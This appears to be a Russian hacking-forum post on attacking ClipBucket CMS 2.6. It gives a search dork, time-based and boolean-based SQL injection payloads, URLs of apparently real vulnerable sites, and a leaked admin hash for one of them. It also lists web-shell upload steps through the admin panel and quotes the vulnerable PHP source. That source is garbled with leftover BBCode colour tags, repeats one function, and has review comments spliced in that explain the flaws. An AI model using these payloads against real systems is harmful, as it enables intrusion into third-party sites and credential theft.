ClipBucket CMS
ClipBucket CMS 2.6 (последняя версия)
clip-bucket.com
prefix: cb_
dorki: Forged by ClipBucket // Arslan Hassan // view_item.php collection item type
exploits:
Time-Based
Код:
GET /watch_video.php?v=GNDB5XUWMW32' AND 666=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),CHAR(32))),1,1)) > 1),SLEEP(5),666) AND 'qwe'='qwe
или
Boolean-Based
Код:
GET /view_item.php?item=DKHM63R22191' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0,1),1,1)) > 112 AND 'qwe'='qwe&type=photos&collection=9
examples:
Сообщение от None
http://video.tv-kino.com/view_item.php?collection=10&item=58HOS3XG5G4U&type =videos
Код:
admin:3afe97fe4ad12d234bec2db193e8e649
Сообщение от None
http://medvideo.kz/view_item.php?item=DKHM63R22191&type=photos&collec tion=9
Сообщение от None
http://watched.eu/watch_video.php?v=X7D8XUB7GAUG
Shell Upload:
Сообщение от None
1) разрешить php как расширение при загрузке
2) разрешить php в шаблонах
3) упаковать в zip и через плагины
Код:
админка: /admin_area
Ну и собственно сюрприз:
// Password digest used for stored credentials: md5(md5(sha1(sha1(md5($string))))).
// NOTE(review): every layer is a fast, unsalted hash, so the nesting adds no real
// resistance to offline guessing, and equal passwords always produce equal digests.
// Replacing the scheme invalidates stored digests; a migration would keep this
// function for verification only and re-hash with password_hash() on the next
// successful login.
function pass_code($string) {
    $digest = md5($string);
    $digest = sha1($digest);
    $digest = sha1($digest);
    $digest = md5($digest);
    return md5($digest);
}
vulnerable files:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]<font color="DarkOrange">
<i>view_item.php</i>
</font>[COLOR="#007700"][/COLOR][COLOR="#0000BB"]is_viewable[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"]))
{
if(empty([/COLOR][COLOR="#0000BB"]$item[/COLOR][COLOR="#007700"]))
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'location:'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]BASEURL[/COLOR][COLOR="#007700"]);
else
{
if(empty([/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]))
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'location:'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]BASEURL[/COLOR][COLOR="#007700"]);
else
{
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$param[/COLOR][COLOR="#007700"]= array([/COLOR][COLOR="#DD0000"]"type"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"cid"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$cdetails[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbcollection[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_collections[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$collect[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cdetails[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
switch([/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"])
{
case[/COLOR][COLOR="#DD0000"]"videos"[/COLOR][COLOR="#007700"]:
case[/COLOR][COLOR="#DD0000"]"v"[/COLOR][COLOR="#007700"]:
{
global[/COLOR][COLOR="#0000BB"]$cbvideo[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbvideo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_video[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$item[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]video_playable[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#FF8000"]//Getting list of collection items
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_clean[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$get_limit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]create_query_limit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$order[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]tbl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"collection_items"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]".ci_id DESC"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbvideo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]collection[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_collection_items_with_details[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$order[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$get_limit[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'items'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'open_collection'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'yes'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbvideo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]collection[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_collection_item_fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'videoid'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'ci_id,collection_id'[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_merge[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]increment_views[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'videoid'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'video'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'object'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$userquery[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_user_details[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'userid'[/COLOR][COLOR="#007700"]]));
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'c'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$collect[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]subtitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]);
} else {
[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]lang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"item_not_exist"[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
} else {
[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]lang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"item_not_exist"[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
}
break;
case[/COLOR][COLOR="#DD0000"]"photos"[/COLOR][COLOR="#007700"]:
case[/COLOR][COLOR="#DD0000"]"p"[/COLOR][COLOR="#007700"]:
{
global[/COLOR][COLOR="#0000BB"]$cbphoto[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbphoto[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_photo[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$item[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbphoto[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]collection[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_collection_item_fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'photo_id'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'ci_id'[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_merge[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]increment_views[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'photo_id'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'photo'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'object'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$userquery[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_user_details[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'userid'[/COLOR][COLOR="#007700"]]));
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'c'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$collect[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]subtitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'photo_title'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]' « '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$collect[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'collection_name'[/COLOR][COLOR="#007700"]]);
} else {
[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]lang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"item_not_exist"[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
} else {
[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]lang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"item_not_exist"[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
}
break;
}
}
}
} else
[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]template_files[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view_item.html'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]display_it[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
watch_video.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]perm_check[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view_video'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$pages[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]page_redir[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#FF8000"]//Getting Video Key
// NOTE(review): 'v' is read from the query string as-is (the @ only silences the
// missing-index notice) and is handed to get_video() with no validation or escaping
// in this listing. get_video() is not shown here, so confirm that it binds or escapes
// the key; otherwise validate the key against its expected format before this call.
[/COLOR][COLOR="#0000BB"]$vkey[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'v'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbvid[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_video[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vkey[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'vdo'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]video_playable[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#FF8000"]/**
* Please check http://code.google.com/p/clipbucket/issues/detail?id=168
* for more details about following code
*/
[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]SEO[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'yes'[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#FF8000"]//Checking if Video URL is Exactly What we have created
[/COLOR][COLOR="#0000BB"]$vid_link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]videoLink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$vid_link_seo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$vid_link[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$vid_link_seo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$vid_link_seo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vid_link_seo[/COLOR][COLOR="#007700"]) -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]//What we are getting
[/COLOR][COLOR="#0000BB"]$server_link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$server_link_seo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$server_link[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$server_link_seo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$server_link_seo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$server_link_seo[/COLOR][COLOR="#007700"]) -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]//Now finally Checking if both are equal else redirect to new link
[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$vid_link_seo[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$server_link_seo[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#FF8000"]//Redirect to valid link leaving mark 301 Permanent Redirect
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'HTTP/1.1 301 Moved Permanently'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$vid_link[/COLOR][COLOR="#007700"]);
exit();
}
}
[/COLOR][COLOR="#FF8000"]//Checking for playlist
[/COLOR][COLOR="#0000BB"]$pid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'play_list'[/COLOR][COLOR="#007700"]];
if(!empty([/COLOR][COLOR="#0000BB"]$pid[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$plist[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbvid[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]action[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_playlist[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$pid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]userid[/COLOR][COLOR="#007700"]());
if([/COLOR][COLOR="#0000BB"]$plist[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cur_playlist'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$pid[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#FF8000"]//Calling Functions When Video Is going to play
[/COLOR][COLOR="#0000BB"]call_watch_video_function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]subtitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]);
}else
[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]//Return category id without '#'
[/COLOR][COLOR="#0000BB"]$v_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]];
if([/COLOR][COLOR="#0000BB"]$v_cat[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'#'[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$video_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$v_cat[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
}else{
[/COLOR][COLOR="#0000BB"]$video_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$v_cat[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$v_cat[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];}
[/COLOR][COLOR="#0000BB"]$vid_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'%#%'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$video_cat[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'vid_cat'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$vid_cat[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]//Displaying The Template
[/COLOR][COLOR="#0000BB"]template_files[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'watch_video.html'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]display_it[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
functions.php[/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'mysql_clean'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]))
{
if([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'no_html'[/COLOR][COLOR="#007700"]])
[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]htmlentities[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'special_html'[/COLOR][COLOR="#007700"]])
[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]htmlspecialchars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mysql_clean'[/COLOR][COLOR="#007700"]])
[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_real_escape_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'nl2br'[/COLOR][COLOR="#007700"]])
[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]nl2br[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]);
return[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"];
}
// This function derives the stored password digest. The combination may be changed
// for security reasons, but it must not be changed again once the script is in use,
// because existing digests would stop matching.
// NOTE(review): all five layers are fast, unsalted hashes (md5/sha1), so the nesting
// does not slow offline guessing in any meaningful way and identical passwords map to
// identical digests. A migration path is to verify with this function and re-hash
// with password_hash() on the next successful login.
function pass_code($string) {
    $digest = md5($string);
    $digest = sha1($digest);
    $digest = sha1($digest);
    $digest = md5($digest);
    return md5($digest);
}
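//Mysql Clean Queries
/**
 * Backslash-escapes $id with addslashes() unless magic quotes already did so.
 *
 * NOTE(review): addslashes() knows nothing about the database connection or its
 * character set and only helps for values placed inside a quoted SQL string
 * literal. It should not be the sole defence for query building; bound
 * parameters are the reliable fix.
 *
 * @param string $id Value to escape.
 * @return string Escaped value.
 */
function sql_free($id)
{
    // get_magic_quotes_gpc() no longer exists in PHP 8; calling it unguarded is a
    // fatal error there. When the function is absent, magic quotes cannot be on.
    $magic_quotes_on = function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc();
    if (!$magic_quotes_on) {
        $id = addslashes($id);
    }
    return $id;
}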
/**
 * Escapes a value with mysql_real_escape_string(), HTML-encodes the result and,
 * unless $replacer is false, passes it through Replacer().
 *
 * NOTE(review): mysql_real_escape_string() only protects values that end up
 * inside a quoted SQL string literal; a value interpolated unquoted (numeric id,
 * LIMIT, ORDER BY) is not protected by it. The mysql_* extension was removed in
 * PHP 7. Replacer() is defined elsewhere; its effect is not visible here.
 *
 * @param string $id       Raw value.
 * @param bool   $replacer Whether to apply Replacer() to the result.
 * @return string
 */
function mysql_clean($id,$replacer=true){
    //$id = clean($id);
    // Undo magic-quotes escaping first so the value is not escaped twice.
    $raw = get_magic_quotes_gpc() ? stripslashes($id) : $id;
    $escaped = mysql_real_escape_string($raw);
    $id = htmlspecialchars($escaped);
    return $replacer ? Replacer($id) : $id;
}
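/**
 * Removes the backslashes added by magic quotes, if magic quotes are active.
 * Returns the input unchanged otherwise.
 *
 * @param string $in Request value.
 * @return string
 */
function escape_gpc($in)
{
    // get_magic_quotes_gpc() no longer exists in PHP 8; guard the call so this
    // helper does not become a fatal error there.
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        $in = stripslashes($in);
    }
    return $in;
}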
//Redirect Using JAVASCRIPT
// Emits a window.location assignment for $url, then terminates the request with a
// fallback message.
// NOTE(review): $url is concatenated into a JavaScript string literal without any
// encoding. If a caller can pass request-derived data here, that is a script
// injection and open-redirect risk; encode with json_encode() and restrict targets
// to known hosts. The enclosing script markup is not present in this listing and
// was presumably lost when the page was extracted; confirm against the original file.
function redirect_to($url){
    $snippet = "\nwindow.location = \"" . $url . "\"\n";
    echo $snippet;
    exit("Javascript is turned off, click here to go to requested page");
}
//Test function to return template file
/**
 * Returns the result of CBTemplate::fetch() for a template.
 *
 * @param string $name   Template name or path.
 * @param bool   $inside When true, $name is passed as-is; otherwise it is
 *                       prefixed with LAYOUT and a slash.
 * @return mixed Whatever CBTemplate::fetch() returns.
 */
function Fetch($name,$inside=FALSE)
{
